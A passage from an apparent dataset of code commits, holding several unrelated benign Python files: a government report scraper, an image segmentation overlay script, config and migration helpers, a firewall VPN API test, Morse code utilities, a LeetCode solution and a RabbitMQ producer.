QA_REVIEWS_URL = "https://www.flra.gov/OIG_QA_Reviews"
SEMIANNUAL_REPORTS_URL = "https://www.flra.gov/IG_semi-annual_reports"
def run(options):
year_range = inspector.year_range(options)
# Pull the reports
for url in [AUDIT_REPORTS_URL, INTERNAL_REVIEWS_URL, QA_REVIEWS_URL, SEMIANNUAL_REPORTS_URL]:
doc = BeautifulSoup(utils.download(url))
results = doc.select("div.node ul li")
for result in results:
report = report_from(result, url, year_range)
if report:
inspector.save_report(report)
def report_from(result, landing_url, year_range):
title = result.text.strip()
if 'Non-Public Report' in title:
unreleased = True
report_url = None
report_id = "-".join(title.split())
else:
unreleased = False
link = result.find("a")
# Some reports have incorrect relative paths
relative_report_url = link.get('href').replace("../", "")
report_url = urljoin(landing_url, relative_report_url)
report_filename = report_url.split("/")[-1]
report_id, _ = os.path.splitext(report_filename)
estimated_date = False
try:
published_on = datetime.datetime.strptime(title, '%B %Y')
except ValueError:
# For reports where we can only find the year, set them to Nov 1st of that year
published_on_year = int(result.find_previous("p").text.strip())
published_on = datetime.datetime(published_on_year, 11, 1)
estimated_date = True
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'flra',
'inspector_url': 'https://www.flra.gov/OIG',
'agency': 'flra',
'agency_name': 'Federal Labor Relations Authority',
'file_type': 'pdf',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if estimated_date:
report['estimated_date'] = estimated_date
if unreleased:
report['unreleased'] = unreleased
report['landing_url'] = landing_url
return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | Python |
|
241cc8fc668b9f6c38d23a97d9ff28cc4c481bf3 | Create github_watchdog,py | gkorg1/watchdog | github_watchdog.py | github_watchdog.py | #!/usr/bin/env python
| apache-2.0 | Python |
|
45af6f13e302fb4e790f8ec5a5730f25c6a9450b | add new segmenter debugging script | mittagessen/kraken,mittagessen/kraken,mittagessen/kraken,mittagessen/kraken | kraken/contrib/heatmap_overlay.py | kraken/contrib/heatmap_overlay.py | #! /usr/bin/env python
"""
Produces semi-transparent neural segmenter output overlays
"""
import sys
import torch
import numpy as np
from PIL import Image
from kraken.lib import segmentation, vgsl, dataset
import torch.nn.functional as F
from typing import *
import glob
from os.path import splitext, exists
model = vgsl.TorchVGSLModel.load_model(sys.argv[1])
model.eval()
batch, channels, height, width = model.input
transforms = dataset.generate_input_transforms(batch, height, width, channels, 0, valid_norm=False)
imgs = sys.argv[2:]
torch.set_num_threads(1)
for img in imgs:
print(img)
im = Image.open(img)
with torch.no_grad():
o = model.nn(transforms(im).unsqueeze(0))
o = F.interpolate(o, size=im.size[::-1])
o = o.squeeze().numpy()
heat = Image.fromarray((o[1]*255).astype('uint8'))
heat.save(splitext(img)[0] + '.heat.png')
overlay = Image.new('RGBA', im.size, (0, 130, 200, 255))
Image.composite(overlay, im.convert('RGBA'), heat).save(splitext(img)[0] + '.overlay.png')
del o
del im
| apache-2.0 | Python |
|
d39a3bae3f6ca66df044e725cd164082170f4ec7 | Modify the config file. | xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet | snippet/lib/python/config.py | snippet/lib/python/config.py | # coding: utf-8
from oslo_config import cfg
from oslo_log import log
CONF = cfg.CONF
_ROOTS = ["root"]
_DEFAULT_LOG_LEVELS = ['root=INFO']
_DEFAULT_LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def parse_args(argv, project, version=None, default_config_files=None,
default_log_format=None, default_log_levels=None):
if project not in _ROOTS:
_DEFAULT_LOG_LEVELS.append('%s=INFO' % project)
_ROOTS.append(project)
log_fmt = default_log_format if default_log_format else _DEFAULT_LOG_FORMAT
log_lvl = default_log_levels if default_log_levels else _DEFAULT_LOG_LEVELS
log.set_defaults(log_fmt, log_lvl)
log.register_options(CONF)
# (TODO): Configure the options of the other libraries, which must be called
# before parsing the configuration file.
CONF(argv[1:], project=project, version=version,
default_config_files=default_config_files)
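# Usage sketch (hypothetical project name):
# import sys
# parse_args(sys.argv, 'snippet', version='0.1')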
| mit | Python |
|
be2f50aae308377dbabd66b5ec78ffb2bd8ae218 | Add tse_number as index | scorphus/politicos | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | """political party: add tse_number as index
Revision ID: 488fc5ad2ffa
Revises: 192bd4ccdacb
Create Date: 2015-07-08 13:44:38.208146
"""
# revision identifiers, used by Alembic.
revision = '488fc5ad2ffa'
down_revision = '192bd4ccdacb'
from alembic import op
def upgrade():
op.create_index('idx_tse_number', 'political_party', ['tse_number'])
def downgrade():
op.drop_index('idx_tse_number', 'political_party')
| agpl-3.0 | Python |
|
96ecfaa423b2d7829fcda0e56e9adba41a4c6819 | Add unit_tests/s2s_vpn | daxm/fmcapi,daxm/fmcapi | unit_tests/s2s_vpn.py | unit_tests/s2s_vpn.py | import logging
import fmcapi
import time
def test_ftds2svpns(fmc):
logging.info('Testing FTDS2SVPNs class. Requires at least one registered device.')
starttime = str(int(time.time()))
namer = f'_fmcapi_test_{starttime}'
# Create a Site2Site VPN Policy
vpnpol1 = fmcapi.FTDS2SVPNs(fmc=fmc, name=namer)
vpnpol1.topologyType = "POINT_TO_POINT"
vpnpol1.ikeV1Enabled = True
vpnpol1.ikeV2Enabled = False
vpnpol1.post()
vpnpol1.get()
# Create some network objects for the encryption domains
obj1 = fmcapi.Networks(fmc=fmc)
obj1.name = '_net1_site1'
obj1.value = '10.255.0.0/24'
obj1.post()
time.sleep(1)
obj2 = fmcapi.Networks(fmc=fmc)
obj2.name = '_net2_site1'
obj2.value = '10.255.1.0/24'
obj2.post()
time.sleep(1)
obj3 = fmcapi.Networks(fmc=fmc)
obj3.name = '_net1_site2'
obj3.value = '10.255.2.0/24'
obj3.post()
time.sleep(1)
# Create Phase 1 settings
# There is no way to search by name, so we just find the iksettings object inside the vpn policy
ike1_json = fmcapi.IKESettings(fmc=fmc)
ike1_json.vpn_policy(pol_name=namer)
items = ike1_json.get()['items'][0]
ike1 = fmcapi.IKESettings(fmc=fmc)
ike1.vpn_policy(pol_name=namer)
ike1.id = items['id']
ike1.get()
ike1.ike_policy(pol_name="preshared_sha_aes192_dh5_10")
ike1.put()
#Create Phase 2 settings
# There is no way to search by name, so we just find the ipsecsettings object inside the vpn policy
ipsec1_json = fmcapi.IPSecSettings(fmc=fmc)
ipsec1_json.vpn_policy(pol_name=namer)
items = ipsec1_json.get()['items'][0]
ipsec1 = fmcapi.IPSecSettings(fmc=fmc)
ipsec1.vpn_policy(pol_name=namer)
ipsec1.id = items['id']
ipsec1.get()
ipsec1.ipsec_policy(pol_name="tunnel_aes256_sha")
ipsec1.put()
#Add vpn peers
#FTD in HA mode should use the name of logical HA device
endp1 = fmcapi.Endpoints(fmc=fmc)
endp1.peerType = "PEER"
endp1.connectionType = "BIDIRECTIONAL"
endp1.vpn_policy(pol_name=namer)
endp1.endpoint(action='add', device_name="_ha_name")
endp1.vpn_interface(device_name='_ha_name', ifname="OUTSIDE1")
endp1.encryption_domain(action='add', names=[
"_net1_site1", "_net2_site1"])
endp2 = fmcapi.Endpoints(fmc=fmc)
endp2.peerType = "PEER"
endp2.connectionType = "BIDIRECTIONAL"
endp2.vpn_policy(pol_name=namer)
endp2.endpoint(action='add', device_name="_device_name")
endp2.vpn_interface(device_name='_device_name', ifname="OUTSIDE1")
endp2.encryption_domain(action='add', names=[
"_net1_site2"])
endp1.post()
endp2.post()
time.sleep(30)
vpnpol1.delete()
obj1.delete()
obj2.delete()
obj3.delete() | bsd-3-clause | Python |
|
75756f20d4b63daa8425609620e4b32dcb9faab4 | Add cryptography unit with morse code functions | Harmon758/Harmonbot,Harmon758/Harmonbot | units/cryptography.py | units/cryptography.py |
from .errors import UnitOutputError
character_to_morse = {
'A': ".-", 'B': "-...", 'C': "-.-.", 'D': "-..", 'E': '.', 'F': "..-.", 'G': "--.", 'H': "....",
'I': "..", 'J': ".---", 'K': "-.-", 'L': ".-..", 'M': "--", 'N': "-.", 'O': "---", 'P': ".--.",
'Q': "--.-", 'R': ".-.", 'S': "...", 'T': '-', 'U': "..-", 'V': "...-", 'W': ".--", 'X': "-..-",
'Y': "-.--", 'Z': "--..", '0': "----", '1': ".----", '2': "..---", '3': "...--", '4': "....-",
'5': ".....", '6': "-....", '7': "--...", '8': "---..", '9': "----.", '.': ".-.-.-", ',': "--..--",
':': "---...", '?': "..--..", "'": ".---.", '-': "-....-", '/': "-..-.", '!': "-.-.--",
'(': "-.--.", ')': "-.--.-", '&': ".-...", ';': "-.-.-.", '=': "-...-", '+': ".-.-.",
'_': "..--.-", '"': ".-..-.", '$': "...-..-", '@': ".--.-.", ' ': '/'
}
morse_to_character = {value: key for key, value in character_to_morse.items()}
def encode_morse_code(message):
try:
return ' '.join(character_to_morse[character] for character in message.upper())
except KeyError as e:
raise UnitOutputError(f"Unable to encode {e}")
def decode_morse_code(message):
try:
return ' '.join(''.join(morse_to_character[character] for character in word.split(' ')) for word in message.split(" / "))
except KeyError as e:
raise UnitOutputError(f"Unable to decode {e}")
| mit | Python |
|
93b3cfb5dd465f956fa6c9ceb09be430684c85ae | Add two pass solution | lemming52/white_pawn,lemming52/white_pawn | leetcode/q019/solution.py | leetcode/q019/solution.py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
d = 1
current = head.next
while current:
d += 1
current = current.next
removal_index = d - n
if removal_index <= 0:
return head.next
counter = 1
prior = head
current = head.next
while counter < removal_index:
prior = current
current = prior.next
counter += 1
if current.next is None:
prior.next = None
else:
following = current.next
prior.next = following
return head
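# One-pass alternative (a sketch, not the solution above): offset two pointers
# by n+1 nodes from a dummy head, advance both until the lead runs off the end,
# then unlink trail.next.
# def removeNthFromEnd(head, n):
#     dummy = ListNode(0)
#     dummy.next = head
#     lead = trail = dummy
#     for _ in range(n + 1):
#         lead = lead.next
#     while lead:
#         lead, trail = lead.next, trail.next
#     trail.next = trail.next.next
#     return dummy.next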
| mit | Python |
|
295823afe17cedaa1934afbcd19d955974089c63 | Add producer written in Python | jovannypcg/rabbitmq_usage,jovannypcg/rabbitmq_usage | python/send.py | python/send.py | #!/usr/bin/env python
import pika
# Host in which RabbitMQ is running.
HOST = 'localhost'
# Name of the queue.
QUEUE = 'pages'
# The message to send.
MESSAGE = 'Hi there! This is a test message =)'
# Getting the connection using pika.
# Creating the channel.
# Declaring the queue.
connection = pika.BlockingConnection(pika.ConnectionParameters(HOST))
channel = connection.channel()
channel.queue_declare(queue=QUEUE)
# Sends the 'MESSAGE' to the queue.
# Default empty 'exchange' with 'routing_key' equal to the queue name
# will route the message to that queue.
channel.basic_publish(exchange='', routing_key=QUEUE, body=MESSAGE)
# The connection is closed.
connection.close()
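# A matching consumer would declare the same queue and register a callback via
# channel.basic_consume, then block in channel.start_consuming() (exact
# signatures vary across pika versions).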
| apache-2.0 | Python |
|
04c8b38ac43c84abe64858cfd22a721e803b87eb | add mocked tests for internal /run folder | lookout/dd-agent,a20012251/dd-agent,gphat/dd-agent,pmav99/praktoras,cberry777/dd-agent,jvassev/dd-agent,c960657/dd-agent,AntoCard/powerdns-recursor_check,takus/dd-agent,truthbk/dd-agent,joelvanvelden/dd-agent,AntoCard/powerdns-recursor_check,ess/dd-agent,tebriel/dd-agent,a20012251/dd-agent,takus/dd-agent,Mashape/dd-agent,pfmooney/dd-agent,eeroniemi/dd-agent,huhongbo/dd-agent,huhongbo/dd-agent,eeroniemi/dd-agent,PagerDuty/dd-agent,c960657/dd-agent,eeroniemi/dd-agent,brettlangdon/dd-agent,jvassev/dd-agent,urosgruber/dd-agent,jamesandariese/dd-agent,zendesk/dd-agent,AniruddhaSAtre/dd-agent,guruxu/dd-agent,mderomph-coolblue/dd-agent,ess/dd-agent,truthbk/dd-agent,cberry777/dd-agent,mderomph-coolblue/dd-agent,yuecong/dd-agent,AntoCard/powerdns-recursor_check,polynomial/dd-agent,manolama/dd-agent,relateiq/dd-agent,jraede/dd-agent,takus/dd-agent,jraede/dd-agent,PagerDuty/dd-agent,guruxu/dd-agent,jyogi/purvar-agent,AniruddhaSAtre/dd-agent,darron/dd-agent,jvassev/dd-agent,c960657/dd-agent,a20012251/dd-agent,huhongbo/dd-agent,darron/dd-agent,urosgruber/dd-agent,oneandoneis2/dd-agent,brettlangdon/dd-agent,amalakar/dd-agent,jamesandariese/dd-agent,darron/dd-agent,jamesandariese/dd-agent,ess/dd-agent,citrusleaf/dd-agent,darron/dd-agent,remh/dd-agent,huhongbo/dd-agent,jshum/dd-agent,polynomial/dd-agent,GabrielNicolasAvellaneda/dd-agent,ess/dd-agent,gphat/dd-agent,jyogi/purvar-agent,gphat/dd-agent,a20012251/dd-agent,manolama/dd-agent,Shopify/dd-agent,GabrielNicolasAvellaneda/dd-agent,benmccann/dd-agent,relateiq/dd-agent,relateiq/dd-agent,lookout/dd-agent,pmav99/praktoras,gphat/dd-agent,takus/dd-agent,Mashape/dd-agent,benmccann/dd-agent,tebriel/dd-agent,oneandoneis2/dd-agent,tebriel/dd-agent,jyogi/purvar-agent,jyogi/purvar-agent,Mashape/dd-agent,Mashape/dd-agent,pfmooney/dd-agent,packetloop/dd-agent,jyogi/purvar-agent,jamesandariese/dd-agent,amalakar/dd-agent,relateiq/dd-agent,zendesk/dd-agent,benmccann/dd-agent,indeedops/dd-agent,amalakar/dd-agent,mderomph-coolblue/dd-agent,c960657/dd-agent,Shopify/dd-agent,PagerDuty/dd-agent,remh/dd-agent,pfmooney/dd-agent,guruxu/dd-agent,pmav99/praktoras,jraede/dd-agent,Shopify/dd-agent,citrusleaf/dd-agent,urosgruber/dd-agent,oneandoneis2/dd-agent,indeedops/dd-agent,ess/dd-agent,relateiq/dd-agent,AntoCard/powerdns-recursor_check,Wattpad/dd-agent,yuecong/dd-agent,tebriel/dd-agent,indeedops/dd-agent,truthbk/dd-agent,mderomph-coolblue/dd-agent,pmav99/praktoras,brettlangdon/dd-agent,oneandoneis2/dd-agent,pfmooney/dd-agent,benmccann/dd-agent,citrusleaf/dd-agent,manolama/dd-agent,Wattpad/dd-agent,jraede/dd-agent,Shopify/dd-agent,lookout/dd-agent,yuecong/dd-agent,AntoCard/powerdns-recursor_check,Wattpad/dd-agent,AniruddhaSAtre/dd-agent,a20012251/dd-agent,brettlangdon/dd-agent,guruxu/dd-agent,jshum/dd-agent,indeedops/dd-agent,joelvanvelden/dd-agent,eeroniemi/dd-agent,joelvanvelden/dd-agent,eeroniemi/dd-agent,jshum/dd-agent,AniruddhaSAtre/dd-agent,indeedops/dd-agent,jvassev/dd-agent,urosgruber/dd-agent,GabrielNicolasAvellaneda/dd-agent,zendesk/dd-agent,brettlangdon/dd-agent,GabrielNicolasAvellaneda/dd-agent,truthbk/dd-agent,citrusleaf/dd-agent,Wattpad/dd-agent,amalakar/dd-agent,Wattpad/dd-agent,zendesk/dd-agent,cberry777/dd-agent,zendesk/dd-agent,citrusleaf/dd-agent,polynomial/dd-agent,pfmooney/dd-agent,huhongbo/dd-agent,jamesandariese/dd-agent,amalakar/dd-agent,jshum/dd-agent,packetloop/dd-agent,c960657/dd-agent,truthbk/dd-agent,pmav99/praktoras,joelvanvelden/dd-agent,remh/dd-agent,polynomial/
dd-agent,remh/dd-agent,darron/dd-agent,manolama/dd-agent,mderomph-coolblue/dd-agent,jraede/dd-agent,PagerDuty/dd-agent,lookout/dd-agent,polynomial/dd-agent,yuecong/dd-agent,urosgruber/dd-agent,remh/dd-agent,cberry777/dd-agent,takus/dd-agent,Shopify/dd-agent,packetloop/dd-agent,oneandoneis2/dd-agent,AniruddhaSAtre/dd-agent,PagerDuty/dd-agent,lookout/dd-agent,jvassev/dd-agent,manolama/dd-agent,packetloop/dd-agent,tebriel/dd-agent,gphat/dd-agent,joelvanvelden/dd-agent,benmccann/dd-agent,cberry777/dd-agent,guruxu/dd-agent,Mashape/dd-agent,GabrielNicolasAvellaneda/dd-agent,jshum/dd-agent,yuecong/dd-agent,packetloop/dd-agent | tests/core/test_run_files.py | tests/core/test_run_files.py | # stdlib
import os
import shlex
import signal
import subprocess
import time
import unittest
# 3p
import mock
from nose.plugins.attrib import attr
# Mock gettempdir for testing
import tempfile; tempfile.gettempdir = mock.Mock(return_value='/a/test/tmp/dir')
# project
# Mock _windows_commondata_path for testing
import config; config._windows_commondata_path = mock.Mock(return_value='./windows_commondata')
from utils.pidfile import PidFile
from checks.check_status import AgentStatus
class TestRunFiles(unittest.TestCase):
""" Tests that runfiles (.pid, .sock, .pickle etc.) are written to internal agent folders"""
# Mac run directory expected location
_my_dir = os.path.dirname(os.path.abspath(__file__))
_mac_run_dir = '/'.join(_my_dir.split('/')[:-4])
def setUp(self):
self.agent_daemon = None
def tearDown(self):
if self.agent_daemon:
args = shlex.split('python agent.py stop')
subprocess.Popen(args).communicate()
@mock.patch('utils.platform.Platform.is_win32', return_value=True)
def test_agent_status_pickle_file_win32(self, *mocks):
''' Test pickle file location on win32 '''
expected_path = os.path.join('.', 'windows_commondata', 'Datadog', 'AgentStatus.pickle')
# check AgentStatus pickle created
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.pidfile.PidFile.get_dir', return_value=_mac_run_dir)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_dmg(self, *mocks):
''' Test pickle file location when running a Mac DMG install '''
expected_path = os.path.join(self._mac_run_dir, 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_source(self, *mocks):
''' Test pickle file location when running a Mac source install '''
expected_path = os.path.join('/a/test/tmp/dir', 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
| bsd-3-clause | Python |
|
cf9299aad62828f1cd116403076b2a6b086721d8 | add meta utilities | fr3akout/flask_ember | flask_ember/util/meta.py | flask_ember/util/meta.py | import inspect
def get_class_fields(klass, predicate=None):
return [(name, field) for name, field in klass.__dict__.items()
if (predicate(name, field) if predicate else True)]
def get_fields(klass, predicate=None):
fields = list()
for base in inspect.getmro(klass)[::-1]:
fields.extend(get_class_fields(base, predicate))
return fields
def get_methods(klass):
return get_fields(klass, lambda name, field: inspect.isfunction(field))
| bsd-3-clause | Python |
|
481a920fe89ea7f0e518b8cf815f966715b20ca3 | add new package : activemq (#14142) | iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/activemq/package.py | var/spack/repos/builtin/packages/activemq/package.py | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Activemq(Package):
"""
Apache ActiveMQ is a high performance Apache 2.0 licensed Message Broker
and JMS 1.1 implementation.
"""
homepage = "https://archive.apache.org/dist/activemq"
url = "https://archive.apache.org/dist/activemq/5.14.0/apache-activemq-5.14.0-bin.tar.gz"
version('5.14.0', sha256='81c623465af277dd50a141a8d9308d6ec8e1b78d9019b845873dc12d117aa9a6')
def install(self, spec, prefix):
install_tree('.', prefix)
| lgpl-2.1 | Python |
|
6b9adf9f00b481562cedf2debc5aede947734744 | remove dot | credativUK/OCB,goliveirab/odoo,markeTIC/OCB,cdrooom/odoo,jaxkodex/odoo,guerrerocarlos/odoo,sv-dev1/odoo,Daniel-CA/odoo,nuncjo/odoo,rschnapka/odoo,sebalix/OpenUpgrade,nuncjo/odoo,feroda/odoo,Endika/OpenUpgrade,PongPi/isl-odoo,shaufi/odoo,alexteodor/odoo,pplatek/odoo,jaxkodex/odoo,Ernesto99/odoo,OpenUpgrade/OpenUpgrade,jolevq/odoopub,tangyiyong/odoo,acshan/odoo,hmen89/odoo,stonegithubs/odoo,ovnicraft/odoo,wangjun/odoo,hassoon3/odoo,numerigraphe/odoo,salaria/odoo,ramitalat/odoo,jiangzhixiao/odoo,abenzbiria/clients_odoo,RafaelTorrealba/odoo,stonegithubs/odoo,RafaelTorrealba/odoo,Elico-Corp/odoo_OCB,shaufi/odoo,ApuliaSoftware/odoo,vnsofthe/odoo,TRESCLOUD/odoopub,CopeX/odoo,cpyou/odoo,Endika/odoo,QianBIG/odoo,slevenhagen/odoo-npg,avoinsystems/odoo,NL66278/OCB,gsmartway/odoo,JCA-Developpement/Odoo,shingonoide/odoo,fuselock/odoo,brijeshkesariya/odoo,odoousers2014/odoo,Nowheresly/odoo,nuuuboo/odoo,provaleks/o8,minhtuancn/odoo,Bachaco-ve/odoo,slevenhagen/odoo,nitinitprof/odoo,damdam-s/OpenUpgrade,abdellatifkarroum/odoo,ubic135/odoo-design,joariasl/odoo,ubic135/odoo-design,grap/OCB,ovnicraft/odoo,acshan/odoo,jpshort/odoo,RafaelTorrealba/odoo,rubencabrera/odoo,collex100/odoo,camptocamp/ngo-addons-backport,osvalr/odoo,nuuuboo/odoo,nexiles/odoo,BT-astauder/odoo,rschnapka/odoo,hip-odoo/odoo,juanalfonsopr/odoo,blaggacao/OpenUpgrade,grap/OCB,Endika/OpenUpgrade,sinbazhou/odoo,jfpla/odoo,ramadhane/odoo,microcom/odoo,OpenUpgrade-dev/OpenUpgrade,oliverhr/odoo,Kilhog/odoo,fdvarela/odoo8,gsmartway/odoo,andreparames/odoo,dezynetechnologies/odoo,odoo-turkiye/odoo,steedos/odoo,jaxkodex/odoo,hubsaysnuaa/odoo,joshuajan/odoo,apanju/odoo,addition-it-solutions/project-all,eino-makitalo/odoo,lombritz/odoo,jiachenning/odoo,makinacorpus/odoo,bplancher/odoo,nuuuboo/odoo,omprakasha/odoo,alhashash/odoo,dgzurita/odoo,florian-dacosta/OpenUpgrade,demon-ru/iml-crm,tarzan0820/odoo,omprakasha/odoo,gorjuce/odoo,chiragjogi/odoo,camptocamp/ngo-addons-backport,rowemoore/odoo,ecosoft-odoo/odoo,erkrishna9/odoo,gvb/odoo,n0m4dz/odoo,luiseduardohdbackup/odoo,havt/odoo,alexcuellar/odoo,spadae22/odoo,odooindia/odoo,gavin-feng/odoo,gdgellatly/OCB1,Endika/odoo,xzYue/odoo,florentx/OpenUpgrade,fevxie/odoo,Nick-OpusVL/odoo,jiachenning/odoo,luistorresm/odoo,CopeX/odoo,gavin-feng/odoo,Endika/OpenUpgrade,shivam1111/odoo,dalegregory/odoo,blaggacao/OpenUpgrade,Nowheresly/odoo,patmcb/odoo,gvb/odoo,csrocha/OpenUpgrade,nitinitprof/odoo,prospwro/odoo,nhomar/odoo,collex100/odoo,sinbazhou/odoo,fossoult/odoo,ehirt/odoo,abdellatifkarroum/odoo,thanhacun/odoo,ramadhane/odoo,patmcb/odoo,hmen89/odoo,credativUK/OCB,luiseduardohdbackup/odoo,bwrsandman/OpenUpgrade,alhashash/odoo,doomsterinc/odoo,sinbazhou/odoo,Noviat/odoo,Maspear/odoo,Endika/OpenUpgrade,tangyiyong/odoo,OpenUpgrade-dev/OpenUpgrade,jiangzhixiao/odoo,ihsanudin/odoo,alhashash/odoo,camptocamp/ngo-addons-backport,camptocamp/ngo-addons-backport,janocat/odoo,microcom/odoo,vrenaville/ngo-addons-backport,stephen144/odoo,ccomb/OpenUpgrade,brijeshkesariya/odoo,mvaled/OpenUpgrade,ShineFan/odoo,CatsAndDogsbvba/odoo,VielSoft/odoo,mustafat/odoo-1,joariasl/odoo,OSSESAC/odoopubarquiluz,guewen/OpenUpgrade,lombritz/odoo,dezynetechnologies/odoo,Elico-Corp/odoo_OCB,mkieszek/odoo,odoousers2014/odoo,javierTerry/odoo,kifcaliph/odoo,Danisan/odoo-1,hanicker/odoo,frouty/odoo_oph,glovebx/odoo,Eric-Zhong/odoo,joshuajan/odoo,gvb/odoo,windedge/odoo,colinnewell/odoo,collex100/odoo,nuncjo/odoo,AuyaJackie/odoo,gorjuce/odoo,blaggacao/OpenUpgrade,fgesora/odoo,shaufi/odoo,MarcosCommu
nity/odoo,kittiu/odoo,fuselock/odoo,fgesora/odoo,bwrsandman/OpenUpgrade,gvb/odoo,ApuliaSoftware/odoo,osvalr/odoo,FlorianLudwig/odoo,BT-astauder/odoo,matrixise/odoo,cedk/odoo,jolevq/odoopub,massot/odoo,ovnicraft/odoo,waytai/odoo,leorochael/odoo,poljeff/odoo,RafaelTorrealba/odoo,oasiswork/odoo,0k/odoo,OpenPymeMx/OCB,xzYue/odoo,sergio-incaser/odoo,brijeshkesariya/odoo,cloud9UG/odoo,nagyistoce/odoo-dev-odoo,Drooids/odoo,alhashash/odoo,ramadhane/odoo,hoatle/odoo,spadae22/odoo,bealdav/OpenUpgrade,mkieszek/odoo,pedrobaeza/odoo,ThinkOpen-Solutions/odoo,alhashash/odoo,tinkhaven-organization/odoo,incaser/odoo-odoo,SerpentCS/odoo,pedrobaeza/OpenUpgrade,cedk/odoo,tinkhaven-organization/odoo,OpenUpgrade/OpenUpgrade,bakhtout/odoo-educ,mvaled/OpenUpgrade,jeasoft/odoo,Gitlab11/odoo,Danisan/odoo-1,ApuliaSoftware/odoo,odoousers2014/odoo,sinbazhou/odoo,funkring/fdoo,NeovaHealth/odoo,JGarcia-Panach/odoo,joshuajan/odoo,goliveirab/odoo,bealdav/OpenUpgrade,KontorConsulting/odoo,goliveirab/odoo,rubencabrera/odoo,MarcosCommunity/odoo,Drooids/odoo,cloud9UG/odoo,fevxie/odoo,ChanduERP/odoo,mustafat/odoo-1,tinkerthaler/odoo,tinkerthaler/odoo,ShineFan/odoo,PongPi/isl-odoo,tinkerthaler/odoo,odoousers2014/odoo,NeovaHealth/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,rahuldhote/odoo,dezynetechnologies/odoo,elmerdpadilla/iv,nhomar/odoo-mirror,ThinkOpen-Solutions/odoo,patmcb/odoo,stonegithubs/odoo,OpenUpgrade-dev/OpenUpgrade,rahuldhote/odoo,takis/odoo,Bachaco-ve/odoo,Bachaco-ve/odoo,MarcosCommunity/odoo,lgscofield/odoo,thanhacun/odoo,Antiun/odoo,nagyistoce/odoo-dev-odoo,hassoon3/odoo,windedge/odoo,joariasl/odoo,cloud9UG/odoo,synconics/odoo,NeovaHealth/odoo,CubicERP/odoo,matrixise/odoo,diagramsoftware/odoo,slevenhagen/odoo-npg,datenbetrieb/odoo,gorjuce/odoo,frouty/odoogoeen,chiragjogi/odoo,feroda/odoo,nhomar/odoo,poljeff/odoo,factorlibre/OCB,kybriainfotech/iSocioCRM,sysadminmatmoz/OCB,hubsaysnuaa/odoo,Daniel-CA/odoo,klunwebale/odoo,ApuliaSoftware/odoo,bwrsandman/OpenUpgrade,Endika/odoo,poljeff/odoo,simongoffin/website_version,minhtuancn/odoo,syci/OCB,oliverhr/odoo,feroda/odoo,BT-fgarbely/odoo,hmen89/odoo,kirca/OpenUpgrade,frouty/odoogoeen,provaleks/o8,gavin-feng/odoo,fjbatresv/odoo,thanhacun/odoo,simongoffin/website_version,OSSESAC/odoopubarquiluz,bguillot/OpenUpgrade,rschnapka/odoo,srimai/odoo,gdgellatly/OCB1,kifcaliph/odoo,Nowheresly/odoo,QianBIG/odoo,ingadhoc/odoo,microcom/odoo,hbrunn/OpenUpgrade,fgesora/odoo,NeovaHealth/odoo,sinbazhou/odoo,ClearCorp-dev/odoo,jeasoft/odoo,jesramirez/odoo,havt/odoo,cedk/odoo,erkrishna9/odoo,Kilhog/odoo,tvibliani/odoo,gvb/odoo,mlaitinen/odoo,charbeljc/OCB,nexiles/odoo,fuhongliang/odoo,hanicker/odoo,fevxie/odoo,deKupini/erp,VielSoft/odoo,nuncjo/odoo,savoirfairelinux/OpenUpgrade,NL66278/OCB,VitalPet/odoo,Danisan/odoo-1,apocalypsebg/odoo,highco-groupe/odoo,goliveirab/odoo,frouty/odoogoeen,BT-astauder/odoo,doomsterinc/odoo,hbrunn/OpenUpgrade,ovnicraft/odoo,chiragjogi/odoo,odootr/odoo,hip-odoo/odoo,florentx/OpenUpgrade,nuncjo/odoo,diagramsoftware/odoo,ehirt/odoo,ujjwalwahi/odoo,acshan/odoo,grap/OpenUpgrade,ApuliaSoftware/odoo,goliveirab/odoo,steedos/odoo,datenbetrieb/odoo,savoirfairelinux/OpenUpgrade,tvibliani/odoo,takis/odoo,alqfahad/odoo,demon-ru/iml-crm,alqfahad/odoo,Maspear/odoo,jfpla/odoo,doomsterinc/odoo,apanju/odoo,0k/odoo,0k/odoo,sve-odoo/odoo,Noviat/odoo,Codefans-fan/odoo,nexiles/odoo,mkieszek/odoo,christophlsa/odoo,QianBIG/odoo,ujjwalwahi/odoo,pedrobaeza/OpenUpgrade,0k/odoo,AuyaJackie/odoo,havt/odoo,matrixise/odoo,shaufi10/odoo,bobisme/odoo,GauravSahu/odoo,odoo-turkiye/odoo,NL66278/OCB,sv-
